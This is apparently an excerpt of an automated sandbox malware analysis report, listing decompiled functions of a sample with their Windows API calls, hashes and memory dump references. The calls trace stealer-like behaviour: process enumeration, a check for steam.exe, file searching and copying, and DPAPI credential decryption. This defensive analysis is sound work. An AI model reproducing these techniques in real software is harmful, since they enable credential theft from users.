                                                                                                                                                                                          • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                          • String ID: N0ZWFt$t.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon
                                                                                                                                                                                          • API String ID: 2647191932-2618821102
                                                                                                                                                                                          • Opcode ID: 5ea3eb4848f12eefc84f8b51558729a95fa2939ec3f6799fddf9e8270cc9a28b
                                                                                                                                                                                          • Instruction ID: 30c0d566e96db8eff76d0e154218483cae55fcd2b8faf282ca1f431055cb1b86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ea3eb4848f12eefc84f8b51558729a95fa2939ec3f6799fddf9e8270cc9a28b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F519FB1D0023D9FDF209B60ED85BEEB7B9AB44345F0000F9A609A7153DA716E88CF55
                                                                                                                                                                                          Function 0002B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,00057424,00056822,?,?,?), ref: 0002B657
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057428), ref: 0002B678
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005742C), ref: 0002B692
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057430,?,00056823), ref: 0002B71F
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002B780
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 0002ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0002AC8A
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 0002B8EB
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002B8FF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3801961486-0
                                                                                                                                                                                          • Opcode ID: d617edf7414c4575c64a2b3faccd6ff32343d05e15bda04645b5cc95770b02db
                                                                                                                                                                                          • Instruction ID: dd2b99f318c09c1dc38f38f3dbad88d48edca6bb06f9086288e05f255fdebe0a
                                                                                                                                                                                          • Opcode Fuzzy Hash: d617edf7414c4575c64a2b3faccd6ff32343d05e15bda04645b5cc95770b02db
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5281DA7690052C9BCF61FB74ED4AADD77B8AB04314F8502A1FC08A7152EB349E998ED1
                                                                                                                                                                                          Function 000324A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 000324B2
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000324D4
                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 000324E4
                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 000324F6
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00032508
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00032521
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                          • String ID: steam.exe
                                                                                                                                                                                          • API String ID: 1799959500-2826358650
                                                                                                                                                                                          • Opcode ID: 04b9bb7363c1e74cb8d7c170d6e7e0948cd69cb964538dfbe342a4c65669ef37
                                                                                                                                                                                          • Instruction ID: f6beeceb47dcb460189cd93829da0e2d26fc9bc4d6b0b69caf71db62e8a6e03e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 04b9bb7363c1e74cb8d7c170d6e7e0948cd69cb964538dfbe342a4c65669ef37
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25012CB1A01219DFEB619B64DC48BEE77FCAF08301F4001E5A40DE61A0EB349B80CB60
                                                                                                                                                                                          Function 00030DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000,0005670D,?,?), ref: 00030E0C
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00030E1A
                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00030E28
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00030E57
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00030EFF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                          • API String ID: 507856799-4001269591
                                                                                                                                                                                          • Opcode ID: 38f7576281f5d7461e10bb3bef72b20c259520ea56a50ac89d82f31058ff3b10
                                                                                                                                                                                          • Instruction ID: 25d51bb0795ab884b92aefbdc9477618b35008a3ddf4da7a44c370ec5b94dbca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 38f7576281f5d7461e10bb3bef72b20c259520ea56a50ac89d82f31058ff3b10
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD314DB1901228AFCB61AF64EC8DBDEB3B8AB08300F5141E5F919A7112D7706EC58F60
                                                                                                                                                                                          Function 0003257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00032589
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00037E31,.exe,00056CCC,00056CC8,00056CC4,00056CC0,00056CBC,00056CB8,00056CB4,00056CB0,00056CAC,00056CA8,00056CA4), ref: 000325A8
                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 000325B8
                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 000325CA
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 000325DC
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 000325F0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1799959500-0
                                                                                                                                                                                          • Opcode ID: ef9cd6a1c0c701d7d889bfb25948bb09d538d0e365a9e4d8e3a56f198e547c32
                                                                                                                                                                                          • Instruction ID: fc546bb9d9e2c4c31db48efcc72437c2067358bb6410d654073e036fa6970fa6
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef9cd6a1c0c701d7d889bfb25948bb09d538d0e365a9e4d8e3a56f198e547c32
                                                                                                                                                                                          • Instruction Fuzzy Hash: 580144715015299FEB619B60DC18FEE77FC9F19301F4500E5E40DE6161EA348F809B35
                                                                                                                                                                                          Function 000280A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0002823B), ref: 000280C4
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,0002823B,?,?,0002823B,0002CB95,?,?,?,?,?,?,?,0002CC90,?,?), ref: 000280D8
                                                                                                                                                                                          • LocalFree.KERNEL32(0002CB95,?,?,0002823B,0002CB95,?,?,?,?,?,?,?,0002CC90,?,?), ref: 000280FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                          • String ID: DPAPI
                                                                                                                                                                                          • API String ID: 2068576380-1690256801
                                                                                                                                                                                          • Opcode ID: 2ed3f7b9a87a97559742fba8df9e881af6d5acc2622ec60c97214ccf81e55112
                                                                                                                                                                                          • Instruction ID: 01a1da541e21463814c445aceab3c2b52dcfb2fc3f03625a928df0e3efbaae7b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ed3f7b9a87a97559742fba8df9e881af6d5acc2622ec60c97214ccf81e55112
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0901F475901218EFCF50DFA8D88489EBBB9FF4C714B118465E905E7310D7719E45CB90
                                                                                                                                                                                          Function 000314A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00056712,?,?), ref: 000314D4
                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 000314E4
                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 00031542
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0003154D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 907984538-0
                                                                                                                                                                                          • Opcode ID: a25750d6d74f1c5ff62f6eac1875d57469ed7cc93cad6e4d0a4e32b383b6e84d
                                                                                                                                                                                          • Instruction ID: 8f5af88badad9fb6c6b69d4ed108784bf210036b3834d4fd410985166a796068
                                                                                                                                                                                          • Opcode Fuzzy Hash: a25750d6d74f1c5ff62f6eac1875d57469ed7cc93cad6e4d0a4e32b383b6e84d
                                                                                                                                                                                          • Instruction Fuzzy Hash: C511A975601218DBDB22AB64EC96BEE73BCAF48300F4001D1F909E7242DF34AE859F61
                                                                                                                                                                                          Function 00030D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00030D49
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00030D50
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 00030D5F
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00030D7D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 362916592-0
                                                                                                                                                                                          • Opcode ID: 7641cd0f2444179559eef54a85529e7567c4a482e2c5c563ad6a8b0c23f1092d
                                                                                                                                                                                          • Instruction ID: a40fe153a92e9a323ba99153ce99b17c67b9994d5ac52b6ddfbb3c066a1098a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7641cd0f2444179559eef54a85529e7567c4a482e2c5c563ad6a8b0c23f1092d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0E07060132867EB109B74FC4DBAF37A9DB04725F410295F515DB1D0DB70AD844796
                                                                                                                                                                                          Function 00030C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000213B9), ref: 00030C5F
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,000213B9), ref: 00030C66
                                                                                                                                                                                          • GetUserNameA.ADVAPI32(00000000,000213B9), ref: 00030C7A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
